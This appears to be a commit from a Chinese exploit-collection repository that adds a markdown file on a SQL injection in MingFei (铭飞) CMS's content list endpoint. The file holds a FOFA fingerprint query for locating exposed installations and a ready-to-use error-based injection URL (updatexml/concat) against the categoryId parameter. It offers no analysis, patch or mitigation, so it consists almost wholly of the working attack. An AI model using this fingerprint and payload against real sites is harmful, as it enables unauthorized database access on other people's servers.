Create 铭飞CMS list接口存在SQL注入.md
This commit is contained in:
parent
e72500f1e7
commit
beed962c23
12
铭飞CMS list接口存在SQL注入.md
Normal file
12
铭飞CMS list接口存在SQL注入.md
Normal file
@ -0,0 +1,12 @@
|
||||
## 铭飞CMS list接口存在SQL注入
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
http://127.0.0.1/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271
|
||||
```
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user